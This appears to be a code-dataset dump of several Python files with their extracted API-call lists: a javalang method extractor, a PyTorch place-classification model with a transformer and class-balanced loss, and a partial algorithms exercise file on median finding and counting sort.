'ignore_case_get', (['request.data', '"""csarId"""'], {}), "(request.data, 'csarId')\n", (2901, 2925), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((2944, 2983), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""nsName"""'], {}), "(request.data, 'nsName')\n", (2959, 2983), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3006, 3050), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""description"""'], {}), "(request.data, 'description')\n", (3021, 3050), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3069, 3109), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""context"""'], {}), "(request.data, 'context')\n", (3084, 3109), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3361, 3618), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer', '_CreateNsRespSerializer', ([], {'data': "{'nsInstanceId': ns_inst_id, 'nsInstanceName': 'nsInstanceName',\n 'nsInstanceDescription': 'nsInstanceDescription', 'nsdId': 123,\n 'nsdInfoId': 456, 'nsState': 'NOT_INSTANTIATED', '_links': {'self': {\n 'href': 'href'}}}"}), "(data={'nsInstanceId': ns_inst_id, 'nsInstanceName':\n 'nsInstanceName', 'nsInstanceDescription': 'nsInstanceDescription',\n 'nsdId': 123, 'nsdInfoId': 456, 'nsState': 'NOT_INSTANTIATED', '_links':\n {'self': {'href': 'href'}}})\n", (3384, 3618), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer\n'), ((3843, 3910), 'rest_framework.response.Response', 'Response', ([], {'data': 'resp_serializer.data', 'status': 'status.HTTP_201_CREATED'}), '(data=resp_serializer.data, status=status.HTTP_201_CREATED)\n', (3851, 3910), False, 'from rest_framework.response import Response\n'), ((1958, 1996), 'lcm.pub.exceptions.NSLCMException', 'NSLCMException', (['resp_serializer.errors'], {}), '(resp_serializer.errors)\n', (1972, 1996), False, 'from lcm.pub.exceptions import NSLCMException\n'), ((2627, 2669), 'lcm.pub.exceptions.BadRequestException', 'BadRequestException', (['req_serializer.errors'], {}), '(req_serializer.errors)\n', (2646, 2669), False, 'from lcm.pub.exceptions import BadRequestException\n'), ((2682, 2719), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""test"""'], {}), "(request.data, 'test')\n", (2697, 2719), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((2750, 2821), 'rest_framework.response.Response', 'Response', ([], {'data': "{'nsInstanceId': 'test'}", 'status': 'status.HTTP_201_CREATED'}), "(data={'nsInstanceId': 'test'}, status=status.HTTP_201_CREATED)\n", (2758, 2821), False, 'from rest_framework.response import Response\n'), ((3789, 3827), 'lcm.pub.exceptions.NSLCMException', 'NSLCMException', (['resp_serializer.errors'], {}), '(resp_serializer.errors)\n', (3803, 3827), False, 'from lcm.pub.exceptions import NSLCMException\n'), ((2123, 2147), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer', '_CreateNsReqSerializer', ([], {}), '()\n', (2145, 2147), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer\n'), ((1739, 1757), 'lcm.ns.biz.ns_get.GetNSInfoService', 'GetNSInfoService', ([], {}), '()\n', (1755, 1757), False, 'from lcm.ns.biz.ns_get import GetNSInfoService\n'), ((1469, 1528), 'lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSerializer', '_QueryNsRespSerializer', ([], {'help_text': '"""NS instances"""', 'many': '(True)'}), "(help_text='NS instances', many=True)\n", (1491, 1528), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer\n'), ((3131, 3186), 'lcm.ns.biz.ns_create.CreateNSService', 'CreateNSService', (['csar_id', 'ns_name', 'description', 'context'], {}), '(csar_id, ns_name, description, context)\n', (3146, 3186), False, 'from lcm.ns.biz.ns_create import CreateNSService\n'), ((2206, 2231), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer', '_CreateNsRespSerializer', ([], {}), '()\n', (2229, 2231), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer\n')] |
#!/usr/bin/env python3
import javalang
def isPrimitive(obj):
return not hasattr(obj, '__dict__')
def extract_bad_function_from_text(src):
return extract_function_from_text(src, criterion='bad')
def extract_function_from_text(src, criterion='bad'):
def recursive_find_deepest_child_position(node_body, prev_deepest=0):
child_direct_child_set = None
# line number, don't currently care about column too much
if isinstance(node_body, list):
deepest_position = prev_deepest
node_children = [c for c in node_body if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
else:
if node_body.position is not None:
deepest_position = node_body.position.line
else:
deepest_position = prev_deepest
node_children = [c for c in node_body.children if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
for child in node_children:
try:
if child.position is not None:
child_sub_pos = child.position.line
else:
child_sub_pos = deepest_position
child_direct_child_set = child.children
except AttributeError:
# most likely is not an object
child_sub_pos = deepest_position
if isinstance(child, list):
child_direct_child_set = child
else:
child_direct_child_set = []
if len(child_direct_child_set) > 0:
child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)
if child_sub_pos > deepest_position:
deepest_position = child_sub_pos
return deepest_position
if not isinstance(src, str):
src = src.decode('utf-8')
src_split = src.split('\n')
try:
tree = javalang.parse.parse(src)
for _, node in tree.filter(javalang.tree.MethodDeclaration):
if node.name.lower() == str(criterion).lower():
# tokenise, find the start/end of method,
# and extract from the file
# needed since javalang can't convert back to java src
start_pos = node.position.line
end_pos = None
if (len(node.body) > 0):
end_pos = recursive_find_deepest_child_position(node.body[-1])
if end_pos is None:
end_pos = start_pos
function_text = ""
for line in range(start_pos, end_pos + 1):
function_text += src_split[line - 1]
return function_text
return ""
except (javalang.parser.JavaSyntaxError,
javalang.parser.JavaParserError) as e:
print("ERROR OCCURRED DURING PARSING")
print(e)
def extract_bad_function(file_path):
return extract_function(file_path, criterion='bad')
def extract_function(file_path, criterion):
with open(file_path, 'r') as f:
return extract_function_from_text(f.read(), criterion)
| [
"javalang.parse.parse"
] | [((2088, 2113), 'javalang.parse.parse', 'javalang.parse.parse', (['src'], {}), '(src)\n', (2108, 2113), False, 'import javalang\n')] |
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
def label_mapping(target):
temp = []
for idx in range(len(target)):
if target[idx][0][:3] == 'con':
target[idx][0] = 'convenience store'
temp.append(label_dict[target[idx][0]])
return temp
def label_remapping(target):
inv_label_dict = {v: k for k, v in label_dict_wo_none.items()}
temp = []
for idx in range(len(target)):
temp.append(inv_label_dict[target[idx]])
return temp
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def place_buffer(images_norm, buffer_images):
if len(buffer_images) == 0:
buffer_images = images_norm
if len(buffer_images) < 10:
for idx in range(10-len(buffer_images)):
buffer_images = [images_norm[0]] + buffer_images
assert len(buffer_images) == 10, 'Buffer failed'
return buffer_images
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input = logits,target = labels_one_hot, weights = weights)
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input = logits, target = labels,reduction = "none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
class place_model(nn.Module):
def __init__(self, num_persons, num_faces, device):
super(place_model, self).__init__()
pre_model = Yolo(num_persons).cuda(device)
num_face_cls = num_faces
self.detector = YoloD(pre_model).cuda(device)
self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
self.avgpool = nn.AvgPool2d(7, stride=1)
# self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
# self.bert_fc1 = torch.nn.Linear(128, 768)
# self.bert_fc2 = torch.nn.Linear(768, 128)
self.bert = BERT()
self.fc2 = torch.nn.Linear(128, 1)
self.fc3 = torch.nn.Linear(128, 22)
self.softmax = torch.nn.Softmax(dim=1)
# # define face
# self.face_conv = nn.Conv2d(
# 1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
def forward(self, image):
N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
image = image.reshape(N*T, C, H, W)
# feature map of backbone
fmap, output_1 = self.detector(image)
fmap = self.place_conv(fmap)
x = self.avgpool(fmap)
x = x.reshape(N, T, -1)
# self.lstm_sc.flatten_parameters()
# N, T = x.size(0), x.size(1)
# x = self.lstm_sc(x)[0]
# x = self.bert_fc1(x)
x = self.bert(x)
# x = self.bert_fc2(x)
change = x.reshape(N*T, -1)
#x = self.fc1(x)
change = self.fc2(change)
change = change.reshape(N, T)
#x = x.reshape(N*T, -1)
M, _ = change.max(1)
w = change - M.view(-1,1)
w = w.exp()
w = w.unsqueeze(1).expand(-1,w.size(1),-1)
w = w.triu(1) - w.tril()
w = w.cumsum(2)
w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
ww = w.new_empty(w.size())
idx = M>=0
ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
idx = ~idx
ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
ww = (ww+1e-10).pow(-1)
ww = ww/ww.sum(1,True)
x = ww.transpose(1,2).bmm(x)
x = x.reshape(N*T, -1)
x = self.fc3(x)
x = x.reshape(N*T, -1)
return x
class BERT(nn.Module):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
"""
:param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super(BERT, self).__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
# multi-layers transformer blocks, deep network
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _ in range(n_layers)])
def forward(self, x):
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len])
# mask = (x > 0).unsqueeze(1).repeat(1, x.size(1), 1).unsqueeze(1)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x)
# running over multiple transformer blocks
for transformer in self.transformer_blocks:
# x = transformer.forward(x, mask)
x = transformer.forward(x, None)
return x
class BERTEmbedding(nn.Module):
"""
BERT Embedding which is consisted with under features
1. TokenEmbedding : normal embedding matrix
2. PositionalEmbedding : adding positional information using sin, cos
2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
sum of all these features are output of BERTEmbedding
"""
def __init__(self, vocab_size, embed_size, dropout=0.):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super(BERTEmbedding, self).__init__()
# self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
# self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
# self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
self.position = PositionalEmbedding(d_model=embed_size)
self.dropout = nn.Dropout(p=dropout)
self.embed_size = embed_size
def forward(self, sequence):
# x = self.token(sequence) + self.position(sequence) + self.segment(segment_label)
x = sequence + self.position(sequence)
return self.dropout(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
pe.require_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
return self.pe[:, :x.size(1)]
class TransformerBlock(nn.Module):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
"""
:param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super(TransformerBlock, self).__init__()
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, mask):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, _x, _x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class MultiHeadedAttention(nn.Module):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout=0.1):
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.attention = Attention()
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
batch_size = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, attn = self.attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x)
class Attention(nn.Module):
"""
Compute 'Scaled Dot Product Attention'
"""
def __init__(self):
super(Attention, self).__init__()
def forward(self, query, key, value, mask=None, dropout=None):
scores = torch.matmul(query, key.transpose(-2, -1))/math.sqrt(query.size(-1))
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
#self.activation = nn.GELU()
self.activation = nn.ReLU()
def forward(self, x):
return self.w_2(self.dropout(self.activation(self.w_1(x))))
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
| [
"torch.nn.ReLU",
"torch.nn.Dropout",
"torch.sin",
"torch.exp",
"math.log",
"numpy.array",
"torch.cos",
"torch.sum",
"torch.nn.AvgPool2d",
"torch.nn.functional.softmax",
"torch.arange",
"torch.nn.BatchNorm2d",
"Yolo_v2_pytorch.src.yolo_tunning.YoloD",
"torch.nn.LayerNorm",
"torch.matmul",... | [((1750, 1839), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_planes', 'out_planes'], {'kernel_size': '(3)', 'stride': 'stride', 'padding': '(1)', 'bias': '(False)'}), '(in_planes, out_planes, kernel_size=3, stride=stride, padding=1,\n bias=False)\n', (1759, 1839), True, 'import torch.nn as nn\n'), ((6545, 6631), 'torch.nn.functional.binary_cross_entropy_with_logits', 'F.binary_cross_entropy_with_logits', ([], {'input': 'logits', 'target': 'labels', 'reduction': '"""none"""'}), "(input=logits, target=labels, reduction=\n 'none')\n", (6579, 6631), True, 'import torch.nn.functional as F\n'), ((6889, 6913), 'torch.sum', 'torch.sum', (['weighted_loss'], {}), '(weighted_loss)\n', (6898, 6913), False, 'import torch\n'), ((6933, 6950), 'torch.sum', 'torch.sum', (['labels'], {}), '(labels)\n', (6942, 6950), False, 'import torch\n'), ((1998, 2013), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2011, 2013), False, 'import torch\n'), ((4869, 4900), 'numpy.power', 'np.power', (['beta', 'samples_per_cls'], {}), '(beta, samples_per_cls)\n', (4877, 4900), True, 'import numpy as np\n'), ((4930, 4953), 'numpy.array', 'np.array', (['effective_num'], {}), '(effective_num)\n', (4938, 4953), True, 'import numpy as np\n'), ((7467, 7492), 'torch.nn.AvgPool2d', 'nn.AvgPool2d', (['(7)'], {'stride': '(1)'}), '(7, stride=1)\n', (7479, 7492), True, 'import torch.nn as nn\n'), ((7749, 7772), 'torch.nn.Linear', 'torch.nn.Linear', (['(128)', '(1)'], {}), '(128, 1)\n', (7764, 7772), False, 'import torch\n'), ((7792, 7816), 'torch.nn.Linear', 'torch.nn.Linear', (['(128)', '(22)'], {}), '(128, 22)\n', (7807, 7816), False, 'import torch\n'), ((7840, 7863), 'torch.nn.Softmax', 'torch.nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (7856, 7863), False, 'import torch\n'), ((12019, 12040), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (12029, 12040), True, 'import torch.nn as nn\n'), ((12750, 12780), 'torch.sin', 'torch.sin', (['(position * div_term)'], {}), '(position * div_term)\n', (12759, 12780), False, 'import torch\n'), ((12803, 12833), 'torch.cos', 'torch.cos', (['(position * div_term)'], {}), '(position * div_term)\n', (12812, 12833), False, 'import torch\n'), ((13901, 13922), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (13911, 13922), True, 'import torch.nn as nn\n'), ((14586, 14613), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_model'], {}), '(d_model, d_model)\n', (14595, 14613), True, 'import torch.nn as nn\n'), ((14675, 14696), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': 'dropout'}), '(p=dropout)\n', (14685, 14696), True, 'import torch.nn as nn\n'), ((15790, 15815), 'torch.nn.functional.softmax', 'F.softmax', (['scores'], {'dim': '(-1)'}), '(scores, dim=-1)\n', (15799, 15815), True, 'import torch.nn.functional as F\n'), ((16140, 16164), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_ff'], {}), '(d_model, d_ff)\n', (16149, 16164), True, 'import torch.nn as nn\n'), ((16184, 16208), 'torch.nn.Linear', 'nn.Linear', (['d_ff', 'd_model'], {}), '(d_ff, d_model)\n', (16193, 16208), True, 'import torch.nn as nn\n'), ((16232, 16251), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (16242, 16251), True, 'import torch.nn as nn\n'), ((16315, 16324), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (16322, 16324), True, 'import torch.nn as nn\n'), ((16704, 16722), 'torch.nn.LayerNorm', 'nn.LayerNorm', (['size'], {}), '(size)\n', (16716, 16722), True, 'import torch.nn as nn\n'), ((16746, 16765), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (16756, 16765), True, 'import torch.nn as nn\n'), ((4978, 4993), 'numpy.sum', 'np.sum', (['weights'], {}), '(weights)\n', (4984, 4993), True, 'import numpy as np\n'), ((5094, 5115), 'torch.tensor', 'torch.tensor', (['weights'], {}), '(weights)\n', (5106, 5115), False, 'import torch\n'), ((5506, 5598), 'torch.nn.functional.binary_cross_entropy_with_logits', 'F.binary_cross_entropy_with_logits', ([], {'input': 'logits', 'target': 'labels_one_hot', 'weights': 'weights'}), '(input=logits, target=labels_one_hot,\n weights=weights)\n', (5540, 5598), True, 'import torch.nn.functional as F\n'), ((7285, 7326), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1024)', '(128)', '(3)', '(1)', '(1)'], {'bias': '(False)'}), '(1024, 128, 3, 1, 1, bias=False)\n', (7294, 7326), True, 'import torch.nn as nn\n'), ((7328, 7347), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(128)'], {}), '(128)\n', (7342, 7347), True, 'import torch.nn as nn\n'), ((7391, 7422), 'torch.nn.LeakyReLU', 'nn.LeakyReLU', (['(0.1)'], {'inplace': '(True)'}), '(0.1, inplace=True)\n', (7403, 7422), True, 'import torch.nn as nn\n'), ((7424, 7442), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)', '(2)'], {}), '(2, 2)\n', (7436, 7442), True, 'import torch.nn as nn\n'), ((15902, 15929), 'torch.matmul', 'torch.matmul', (['p_attn', 'value'], {}), '(p_attn, value)\n', (15914, 15929), False, 'import torch\n'), ((7125, 7142), 'Yolo_v2_pytorch.src.yolo_net.Yolo', 'Yolo', (['num_persons'], {}), '(num_persons)\n', (7129, 7142), False, 'from Yolo_v2_pytorch.src.yolo_net import Yolo\n'), ((7215, 7231), 'Yolo_v2_pytorch.src.yolo_tunning.YoloD', 'YoloD', (['pre_model'], {}), '(pre_model)\n', (7220, 7231), False, 'from Yolo_v2_pytorch.src.yolo_tunning import YoloD\n'), ((12495, 12524), 'torch.zeros', 'torch.zeros', (['max_len', 'd_model'], {}), '(max_len, d_model)\n', (12506, 12524), False, 'import torch\n'), ((14509, 14536), 'torch.nn.Linear', 'nn.Linear', (['d_model', 'd_model'], {}), '(d_model, d_model)\n', (14518, 14536), True, 'import torch.nn as nn\n'), ((5032, 5064), 'torch.nn.functional.one_hot', 'F.one_hot', (['labels', 'no_of_classes'], {}), '(labels, no_of_classes)\n', (5041, 5064), True, 'import torch.nn.functional as F\n'), ((12585, 12609), 'torch.arange', 'torch.arange', (['(0)', 'max_len'], {}), '(0, max_len)\n', (12597, 12609), False, 'import torch\n'), ((6780, 6804), 'torch.exp', 'torch.exp', (['(-1.0 * logits)'], {}), '(-1.0 * logits)\n', (6789, 6804), False, 'import torch\n'), ((12651, 12678), 'torch.arange', 'torch.arange', (['(0)', 'd_model', '(2)'], {}), '(0, d_model, 2)\n', (12663, 12678), False, 'import torch\n'), ((12691, 12708), 'math.log', 'math.log', (['(10000.0)'], {}), '(10000.0)\n', (12699, 12708), False, 'import os, sys, math\n')] |
"""
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
"""
Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
ends and idx must be valid index. Count the number of comparisons
by populating A with RecordedItem instances.
"""
if lo == hi:
return lo
A[idx],A[lo] = A[lo],A[idx] # swap into position
i = lo
j = hi + 1
while True:
while True:
i += 1
if i == hi: break
if A[lo] < A[i]: break
while True:
j -= 1
if j == lo: break
if A[j] < A[lo]: break
# doesn't count as comparing two values
if i >= j: break
A[i],A[j] = A[j],A[i]
A[lo],A[j] = A[j],A[lo]
return j
def linear_median(A):
"""
Efficient implementation that returns median value in arbitrary list,
assuming A has an odd number of values. Note this algorithm will
rearrange values in A.
"""
# if len(A) % 2 == 0:
# raise ValueError('linear_median() only coded to work with odd number of values.')
lo = 0
hi = len(A) - 1
mid = hi // 2
while lo < hi:
idx = random.randint(lo, hi) # select valid index randomly
j = partition(A, lo, hi, idx)
if j == mid:
return A[j]
if j < mid:
lo = j+1
else:
hi = j-1
return A[lo]
def median_from_sorted_list(A):
sorted_A = sorted(A)
len_A = len(A)
if len_A % 2 == 0:
return (sorted_A[(len_A//2) - 1] + sorted_A[len_A//2]) / 2
else:
return sorted_A[len_A//2]
def counting_sort(A, M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for v in A:
counts[v] += 1
pos = 0
v = 0
while pos < len(A):
for idx in range(counts[v]):
A[pos+idx] = v
pos += counts[v]
v += 1
def counting_sort_improved(A,M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for val in A:
counts[val] += 1
pos = 0
val = 0
while pos < len(A):
if counts[val] > 0:
A[pos:pos+counts[val]] = [val] * counts[val]
pos += counts[val]
val += 1
def run_counting_sort_trials(max_k=15, output=True):
"""Generate table for counting sort up to (but not including) max_k=15."""
tbl = DataTable([8,15,15],
['N', 'counting_sort', 'counting_sort_improved'], output=output)
M = 20 # arbitrary value, and results are dependent on this value.
trials = [2**k for k in range(8, max_k)]
for n in trials:
t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
